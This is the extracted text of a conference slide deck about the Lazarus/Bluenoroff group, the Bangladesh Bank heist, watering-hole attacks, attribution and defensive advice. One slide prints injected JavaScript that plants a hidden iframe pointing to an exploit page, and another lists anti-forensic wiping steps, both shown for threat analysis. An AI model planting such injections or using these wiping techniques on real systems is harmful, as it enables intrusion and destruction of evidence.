chasing the bad guys from bangladesh to costa rica · chasing the bad guys from bangladesh to costa...
TRANSCRIPT
SESSION ID:SESSION ID:
#RSAC
Vitaly Kamluk
Chasing the Bad Guys from Bangladesh to Costa Rica
FLE-R01
Director of APAC Research Centre,Kaspersky Lab@vkamluk
#RSAC
# whoami
Few words about the author
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
# whoami
3
Eugene KasperskyVitaly Kamluk
12+ years at Kaspersky Lab2 years at INTERPOL
Focus:Malware AnalysisIncident ResponseDigital Forensics
Position:Head of security researchers in APAC region
#RSAC
Attacks Evolution
Quick overview and latest figures
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
1NEW VIRUS EVERY HOUR
1994
1NEW VIRUS EVERY MINUTE
2006
1NEW VIRUS EVERY SECOND
2011
323,000NEW SAMPLES EVERY DAY
2017
THE SCALE OF THE THREAT
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
0.1%
9.9%
90%Traditional cybercrime
Targeted threats to organisations
Cyber-weapons
Targeted attacks
APTs
THE NATURE OF THE THREAT
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Exploitkits
Social networks
USB
HOW MALWARE SPREADS
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
TARGETED ATTACK RESEARCHES
Darkhotel- part 2
MsnMMCampaigns
SatelliteTurla
WildNeutron
BlueTermite
SpringDragon
2011
2010
2013
Stuxnet
Duqu
2012
Gauss
Flame
miniFlame
NetTraveler
Miniduke
RedOctober
Icefog
Winnti
Kimsuky
TeamSpy
2014
Epic Turla
CosmicDuke
Regin
Careto / The Mask
Energetic Bear / Crouching Yeti
Darkhotel
2015
Desert Falcons
Hellsing
Sofacy
Carbanak
Equation
Naikon
AnimalFarm
Duqu 2.0
ProjectSauron
Saguaro
StrongPity
Ghoul
Fruity Armor
ScarCruft
2016
Poseidon
Lazarus
Lurk
GCMan
Danti
Adwind
Dropping Elephant
Metel
We discover and dissect the world’s most sophisticated threats
#RSAC
Bangladesh Hack
The story of one of the biggest cyberheists in history
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
THE FIRST ANNOUNCEMENTS
11
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
12
SCHEMATICS OF CYBER HEIST
US BANK Compromised BankCorr. Account
Offshore Bank
Attacker
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
13
SCHEMATICS OF CYBER HEIST
US BANK Compromised BankCorr. Account
Offshore Bank Attacker
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
14
Watershed event for SWIFT and the global financial industry
High level of sophistication / knowledge – hiding of business/application evidence
• Deletion of fraudulent payment instructions from database
• Modification of SWIFT messages (end/start of day statements)
• Bypass of integrity verification checks
Customer Security Programme
BANGLADESH BANK INCIDENT
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
15
The SWIFT Network and connections to the SWIFT network have not been compromised
SWIFT does not rely on the customer’s security to secure the SWIFT Network
Each customer is responsible and accountable for protecting its local environment and access to SWIFT
NOTES FROM SWIFT
#RSAC
LAZARUS!
What is this Lazarus actor?
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
SONY PICTURES INCIDENT (2014)
17
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
18
Credits: Novetta
OPERATION BLOCKBUSTER (2016)
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
19
Courtesy of Novetta
PREVIOUS CAMPAIGNS
#RSAC
BUT WAS IT REALLY LAZARUS?
Let’s find that out
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
PREVIOUS RESEARCH
21
Vietnam Bangladesh
2016
Lazarus
Compromised webserver
20172015
Philippines
Wiper Wiper
Wiper
Text String
? ? ?
Poland
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
A BETTER PROOF
22
Vietnam Bangladesh
2016
Compromised webserver
20172015
South EastAsia
Patched filesConfig file formatOperation time
Poland, Mexico, and
others
Africa,Costa Rica
Overall designC2 ProtocolOwn PE-loaderImport resolution
Trace formatRC4 key
Lazarus
? ? ?
Philippines
Wiper Wiper
Wiper
Text String
Poland, Mexico, and
others
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
23
WORLDWIDE DETECTIONSBangladeshTaiwanVietnamThailandIraqMalaysiaIndonesiaIndiaPolandEthiopiaNigeriaGabonKenyaUruguayMexicoChileBrazilChileCosta Rica
Banks
Casinos
Investment Firms
CryptocurrencyBussinesses
source: KSN
#RSAC
INFECTION VECTOR
How do they get in?
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
WATERING HOLE ATTACKS
25
Polish website Mexican website
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
MALICIOUS CODE INJECTION
26
document.write("<div width='0px' height='0px'><iframewidth='145px'height='146px'style='left:-2144px; position:absolute; top:0px;'src='https://[PATH]/view.jsp?pagenum=1'..>
</iframe></div>");
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
SITE REDIRECTION
27
iframe
Governmentwebsite
Visitors
JScript Exploit
Other compromisedwebsite
TargetList
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
MAP OF TARGETS
28
#RSAC
OTHER TARGETS
Who else do they hit?
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
More illegal profit
30
Mining cryptocurrency on other compromised hosts
Two crypto-currency businesses compromised
63+ ATMs were infected in South Korea
Two Korean local ATM vendors breached
EMV credit card writer software backdooredDistributed via hacking/carder forums
#RSAC
TACTICS
Some of interesting techniques
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
32
ANTI-FORENSIC TECHNIQUES
• Wiping files securely:• overwrite file with random pattern;• rename file to a random name;• delete the file using system API;• repeatedly create and delete new files
• Wiping registry values securely:• overwrite value with random pattern;• delete the registry value;• apply the same to all keys recursively.
• Self-cleanup:• wipe temp files, configs, components
• Wiping prefetch files.• Wiping event log files.
• initiate event log backup • the system releases the file lock;
• wipe file securely.• DLL unloading and self-removal:
• use minimalistic 5Kb DLL to do initiate external unloading and memory cleaning.
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
ANTI-FORENSIC TECHNIQUES
Password Protection 20-31 alpha-numeric charactersDiscovered passwords:
Isolated subnetfor SWIFT
InternalIT system
LoaderEncrypted Payload
KeyloggerComponent Isolation
1 2
3
#RSAC
WHO ARE THEY?
What else we know about them
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
BLUENOROFF: A LAZARUS UNIT
Cyber Espionage
Cyber Sabotage
Money Theft
Data Exfiltration
DoS
C2 Operation
Infiltration
Backdoors Development
Wiping Attacks
Cryptocurrency Mining
Lazarus
Bluenorroff
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
COMPARING THE CODE
36
No obfuscationStandard import resolutionNon-packed code*No network communicationSecure file-wipingEnglish languageExecution tracingRegular engineering operationNo visible false flagsNever used VirusTotal
Custom code obfuscatorObscured import resolution
Commercial packers (i.e. Enigma, Obsidium)Communication with C2 + Infrastructure support
Full scale of anti-forensicsKorean+English language
No execution tracingDisguise and stealthFalse flag operations
Uses VirusTotal
LAZARUS CODE BLUENOROFF CODE
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
37
LANGUAGE ARTEFACTS
Some Not Bad English
execute_nroff(%s) - success with exit_code=%08Xcopying to %s failed with error=%d[FOXIT_READER] : Successfully copied to %sPDFModulation failed, so logclear will be executed.Executing real foxit reader with CommandLine = %s.[LOG_CLEAR] : failed to delete source file.Receiver :Sender :DO_NOT_USE_MMexecute_nroff(%s) - success with exit_code=%08Xexecute_nroff(%s) - failed with error=%dcopy failed [%s]-[%s] with error = %dcopy success [%s]-[%s]backup_file(%s, %s, %d)=%dPatchMemory(%s, %d)[WorkMemory] pid=%d, name=%s
Korean Locale
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
FALSE FLAGS
3. Backdoor Commands
kliyent2pondklyuchit ssylka ustanavlivat poluchit
pereslat derzhat vykhodit Nachalo
1. Exploit code
chainik babaLEna geigeigei3raza daiadreschainika
2. Enigma Protector
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
39
THE BIGGEST OPSEC FAILURE
From the server logs of a C2 in Europe:
2017-01-18 02:54: Apache Tomcat started on port 80802017-01-18 04:10: HTTP GET view.jsp (via VPN in France)2017-01-18 04:10: Testing bot (via VPN in France)...2017-01-18 08:12: Testing bot (via VPN in Korea)...2017-01-18 11:12: Testing bot (from IP in North Korea)
175.45.***.***inetnum: 175.45.176.0 - 175.45.179.255netname: STAR-KPdescr: Ryugyong-dongdescr: Potong-gang Districtrole: STAR JOINT VENTURE CO LTDaddress: Ryugyong-dong Potong-gang Districtcountry: KP
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
RECENT CONFIRMATION
Source: Group-IB
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
41
ATTRIBUTION CONCLUSIONS
1. Someone invested huge amount of money to frame NK*. *less likely.
2. A third force could be involved to help NK from the outside.
3. If this is truly North Korea, it means we know very little about their current motivation and use of cyber offense.
#RSAC
THE LAST DROP
One more thing…
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
43
WANNACRY
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
45
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
ATTRIBUTION
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Visible Code Flow Similarity
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
OBSOLETE LIBRARY
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
WannaCry socket setup
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Lazarus socket setup
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
API address resolution (dynamic import)
DYNAMIC IMPORTS
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
CONCLUSIONS
• LAZARUS is one of the most aggressive and persistent APT groups.• They have support of dozens (or hundreds?) of people.• Their unusual financial motivation makes them different from other actors.• Public exposure doesn’t stop them for long.• They seem to switch to hacking and recruiting other hackers.• They have no obligations, no code of conduct, no moral principles.
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
RECOMMENDATIONS
Common best practice against APT attacks:• Make sure you update your software. TEST IT!• Segregate your networks• Record your netflow (or whole traffic if you can)• Use endpoint security solutions, firewalls, etc, but DO MONITOR ALERTS.
• In case of ANY minor infection – get to the ROOT CAUSE of it.
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
ADVANCED RECOMMENDATIONS
Advanced techniques against APT attacks:• Enable extensive logging (hint: deploy sysmon)• Use honeypots and home-built deception• Use custom set of yara rules (hint: create own yara rules)
• Scan network traffic• Scan and identify reliably all new malware/adware/etc
• Hint: sometimes “adware” is not what it seems• Hint: if you cannot identify the file:
• Ask VirusTotal• Search online• Ask security researchers
#RSAC
HOW TO CHANGE GLOBAL SECURITY LANDSCAPE?What we do and what you could do too.
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Expert Police
CONNECTING PRIVATE SECTOR TO POLICE
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
270Mb 350Mb 750Mb
Minimal
Optimal
Maximal
size
features
BITSCOUT FLAVORS
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Remote Location
Expert
Step 1.
Step 2.Step 3.
Trusted ServerTerminal Access
OwnerPolice
REMOTE ASSISTANCE IN A NUTSHELL
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
Expert
A remote system
Virtual HDD
Virtual host
Physical host
Real HDD
Root shell
Owner
Police
SOLVING THE PROBLEM OF TRUST
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
• Minimal and robust• Runs on any old and new hardware• Records remote user sessions• Device access authorized by the owner• Provides multi-user sessions• Perfect for education
• Lets you build YOUR OWN OS!• FREE for all and OPEN-SOURCE! github.com/vitaly-kamluk
Download Bitscout here:
BITSCOUT FEATURES
#RSAC
THANK YOU!
Vitaly Kamluk, Kaspersky Lab
@vkamlukgithub.com/vitaly-kamluk